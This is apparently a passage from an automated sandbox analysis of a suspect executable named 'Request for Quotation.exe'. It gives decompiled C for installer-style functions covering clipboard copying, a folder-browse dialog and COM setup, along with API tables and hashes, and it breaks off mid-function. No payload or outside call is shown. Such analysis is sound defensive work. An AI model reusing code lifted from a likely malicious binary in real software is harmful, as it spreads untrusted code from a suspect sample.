                                                                                • Instruction Fuzzy Hash: 74A00271944900DBDE81DFE1890BF143B72F7CB725F0881A2E31558194C6754038EB35
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                                0x004054b8
                                                                                0x004054c0
                                                                                0x004054c3
                                                                                0x004054cb
                                                                                0x004054ce
                                                                                0x0040565d
                                                                                0x00405663
                                                                                0x00405687
                                                                                0x00405687
                                                                                0x00405693
                                                                                0x00405699
                                                                                0x004056bb
                                                                                0x004056bb
                                                                                0x004056c1
                                                                                0x00405716
                                                                                0x00405716
                                                                                0x00405719
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040571b
                                                                                0x0040571e
                                                                                0x00405721
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040572b
                                                                                0x00405731
                                                                                0x00405733
                                                                                0x00405736
                                                                                0x00405833
                                                                                0x00000000
                                                                                0x00405833
                                                                                0x00405745
                                                                                0x00405751
                                                                                0x0040575a
                                                                                0x00405761
                                                                                0x00405765
                                                                                0x00405768
                                                                                0x00405771
                                                                                0x00405777
                                                                                0x0040577a
                                                                                0x0040577a
                                                                                0x0040578a
                                                                                0x00405790
                                                                                0x00405793
                                                                                0x0040579e
                                                                                0x0040579e
                                                                                0x0040579f
                                                                                0x004057a2
                                                                                0x004057a9
                                                                                0x004057b0
                                                                                0x004057b8
                                                                                0x004057b8
                                                                                0x004057c6
                                                                                0x004057cc
                                                                                0x004057cf
                                                                                0x004057cf
                                                                                0x004057d6
                                                                                0x004057dc
                                                                                0x004057e5
                                                                                0x004057ec
                                                                                0x004057f5
                                                                                0x004057f7
                                                                                0x004057fa
                                                                                0x00405809
                                                                                0x0040580b
                                                                                0x0040580e
                                                                                0x0040580f
                                                                                0x00405812
                                                                                0x00405813
                                                                                0x00405814
                                                                                0x00405814
                                                                                0x0040581c
                                                                                0x00405827
                                                                                0x0040582d
                                                                                0x0040582d
                                                                                0x00000000
                                                                                0x00405793
                                                                                0x004056c3
                                                                                0x004056c9
                                                                                0x004056f7
                                                                                0x004056f9
                                                                                0x004056ff
                                                                                0x0040570a
                                                                                0x0040570a
                                                                                0x00405711
                                                                                0x00000000
                                                                                0x00405711
                                                                                0x004056cd
                                                                                0x004056d7
                                                                                0x00000000
                                                                                0x0040569b
                                                                                0x0040569b
                                                                                0x004056a1
                                                                                0x004056dc
                                                                                0x00000000
                                                                                0x004056e3
                                                                                0x004056aa
                                                                                0x004056b1
                                                                                0x004056b6
                                                                                0x00000000
                                                                                0x004056b6
                                                                                0x00405699
                                                                                0x004054d4
                                                                                0x004054d8
                                                                                0x004054e0
                                                                                0x004054e4
                                                                                0x004054e7
                                                                                0x004054ea
                                                                                0x004054ed
                                                                                0x004054f0
                                                                                0x004054f1
                                                                                0x004054f2
                                                                                0x0040550b
                                                                                0x0040550e
                                                                                0x00405518
                                                                                0x00405527
                                                                                0x0040552f
                                                                                0x00405537
                                                                                0x0040553c
                                                                                0x0040553f
                                                                                0x0040554b
                                                                                0x00405554
                                                                                0x0040555d
                                                                                0x0040557f
                                                                                0x00405585
                                                                                0x00405596
                                                                                0x0040559b
                                                                                0x004055a9
                                                                                0x004055b7
                                                                                0x004055b7
                                                                                0x004055bc
                                                                                0x004055ca
                                                                                0x004055ca
                                                                                0x004055cf
                                                                                0x004055d2
                                                                                0x004055d7
                                                                                0x004055e3
                                                                                0x004055ec
                                                                                0x004055f9
                                                                                0x00405608
                                                                                0x004055fb
                                                                                0x00405600
                                                                                0x00405600
                                                                                0x00405614
                                                                                0x00405614
                                                                                0x00405628
                                                                                0x00405631
                                                                                0x0040563a
                                                                                0x0040564a
                                                                                0x00405656
                                                                                0x00405656
                                                                                0x00000000

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 00405511
                                                                                • GetDlgItem.USER32 ref: 00405520
                                                                                • GetClientRect.USER32 ref: 0040555D
                                                                                • GetSystemMetrics.USER32 ref: 00405564
                                                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405600
                                                                                • GetDlgItem.USER32 ref: 00405621
                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
                                                                                • GetDlgItem.USER32 ref: 0040552F
                                                                                  • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                • GetDlgItem.USER32 ref: 00405672
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005446,00000000), ref: 00405680
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                                                • ShowWindow.USER32(00000000), ref: 004056AA
                                                                                • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                                                • ShowWindow.USER32(00000008), ref: 004056F7
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
                                                                                • CreatePopupMenu.USER32 ref: 0040573C
                                                                                • AppendMenuA.USER32 ref: 00405751
                                                                                • GetWindowRect.USER32 ref: 00405771
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
                                                                                • OpenClipboard.USER32(00000000), ref: 004057D6
                                                                                • EmptyClipboard.USER32 ref: 004057DC
                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                                                • GlobalLock.KERNEL32 ref: 004057EF
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405827
                                                                                • CloseClipboard.USER32 ref: 0040582D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID:
                                                                                • API String ID: 590372296-0
                                                                                • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                                • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x6aacde
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                0x00404763
                                                                                0x00404769
                                                                                0x0040476f
                                                                                0x0040477c
                                                                                0x0040478a
                                                                                0x0040478d
                                                                                0x00404795
                                                                                0x0040479b
                                                                                0x0040479b
                                                                                0x004047a7
                                                                                0x004047aa
                                                                                0x00404818
                                                                                0x0040481f
                                                                                0x004048f6
                                                                                0x004048fd
                                                                                0x0040490c
                                                                                0x0040490c
                                                                                0x00404910
                                                                                0x0040491a
                                                                                0x00404927
                                                                                0x00404929
                                                                                0x00404929
                                                                                0x00404937
                                                                                0x0040493e
                                                                                0x00404945
                                                                                0x00404948
                                                                                0x0040497f
                                                                                0x00404981
                                                                                0x00404987
                                                                                0x0040498c
                                                                                0x00404990
                                                                                0x00404992
                                                                                0x00404992
                                                                                0x004049ae
                                                                                0x00000000
                                                                                0x004049b0
                                                                                0x004049b3
                                                                                0x004049c1
                                                                                0x004049c7
                                                                                0x004049c8
                                                                                0x004049cb
                                                                                0x004049ce
                                                                                0x00000000
                                                                                0x004049ce
                                                                                0x0040494a
                                                                                0x0040494c
                                                                                0x00404950
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404952
                                                                                0x00404952
                                                                                0x0040495f
                                                                                0x00404964
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404968
                                                                                0x0040496a
                                                                                0x0040496a
                                                                                0x00404972
                                                                                0x00404974
                                                                                0x00404977
                                                                                0x0040497a
                                                                                0x0040497d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040497d
                                                                                0x004049da
                                                                                0x004049e4
                                                                                0x004049e7
                                                                                0x004049ea
                                                                                0x004049f1
                                                                                0x004049f1
                                                                                0x004049f3
                                                                                0x004049f3
                                                                                0x004049f8
                                                                                0x004049fa
                                                                                0x00404a02
                                                                                0x00404a09
                                                                                0x00404a0b
                                                                                0x00404a16
                                                                                0x00404a16
                                                                                0x00404a0b
                                                                                0x00404a1d
                                                                                0x00404a26
                                                                                0x00404a30
                                                                                0x00404a38
                                                                                0x00404a53
                                                                                0x00404a3a
                                                                                0x00404a43
                                                                                0x00404a43
                                                                                0x00404a38
                                                                                0x00404a58
                                                                                0x00404a5d
                                                                                0x00404a62
                                                                                0x00404a6b
                                                                                0x00404a6b
                                                                                0x00404a74
                                                                                0x00404a76
                                                                                0x00404a76
                                                                                0x00404a82
                                                                                0x00404a8a
                                                                                0x00404a94
                                                                                0x00404a94
                                                                                0x00404a99
                                                                                0x00000000
                                                                                0x00404a99
                                                                                0x00404948
                                                                                0x004048ff
                                                                                0x00404906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404906
                                                                                0x00404825
                                                                                0x0040482e
                                                                                0x00404848
                                                                                0x0040484d
                                                                                0x00404857
                                                                                0x0040485e
                                                                                0x0040486a
                                                                                0x0040486d
                                                                                0x00404870
                                                                                0x00404877
                                                                                0x0040487f
                                                                                0x00404882
                                                                                0x00404886
                                                                                0x0040488d
                                                                                0x00404895
                                                                                0x004048ef
                                                                                0x00404897
                                                                                0x00404898
                                                                                0x0040489f
                                                                                0x004048a9
                                                                                0x004048b1
                                                                                0x004048be
                                                                                0x004048d2
                                                                                0x004048d6
                                                                                0x004048d6
                                                                                0x004048d2
                                                                                0x004048db
                                                                                0x004048e8
                                                                                0x004048e8
                                                                                0x00404895
                                                                                0x00000000
                                                                                0x0040484d
                                                                                0x0040483b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404841
                                                                                0x00000000
                                                                                0x004047ac
                                                                                0x004047b9
                                                                                0x004047c2
                                                                                0x004047cf
                                                                                0x004047cf
                                                                                0x004047d6
                                                                                0x004047dc
                                                                                0x004047e5
                                                                                0x004047e8
                                                                                0x004047eb
                                                                                0x004047f3
                                                                                0x004047f6
                                                                                0x004047f9
                                                                                0x004047ff
                                                                                0x00404806
                                                                                0x0040480d
                                                                                0x00404a9f
                                                                                0x00404ab1
                                                                                0x00404813
                                                                                0x00404816
                                                                                0x00000000
                                                                                0x00404816
                                                                                0x0040480d

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 004047B2
                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                • SetDlgItemTextA.USER32 ref: 004048E8
                                                                                  • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                  • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                  • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                  • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                  • Part of subcall function 00406528: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                                  • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                  • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                  • Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                • API String ID: 2624150263-3265145871
                                                                                • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
